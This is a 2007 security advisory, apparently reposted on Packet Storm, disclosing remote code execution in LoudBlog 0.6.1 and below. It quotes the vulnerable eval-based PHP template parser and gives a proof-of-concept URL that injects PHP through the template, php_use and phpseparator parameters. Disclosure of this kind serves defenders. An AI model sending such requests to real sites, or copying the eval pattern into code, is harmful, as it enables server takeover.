LoudBlog versions 0.6.1 and below suffer from a remote code execution vulnerability.
f18d2380c43354ebedee91b17a7cf737daad49b0ee78caef7b3efb88e7049ca3----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ]
Loudblog >= 0.6.1 Remote Code Execution
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
Template parser function
<?php
$parsedpage = fullparse(firstparse(hrefmagic($template)));
//do we have php code within our template? switch between echo and eval!
if ($php_use) {
$templatepieces = explode ($phpseparator, $parsedpage);
for ($i = 0; $i <= count($templatepieces); $i += 2) {
echo $templatepieces[$i];
if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]);
}
//no php code, no eval!
} else {
echo $parsedpage;
}
?>
loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed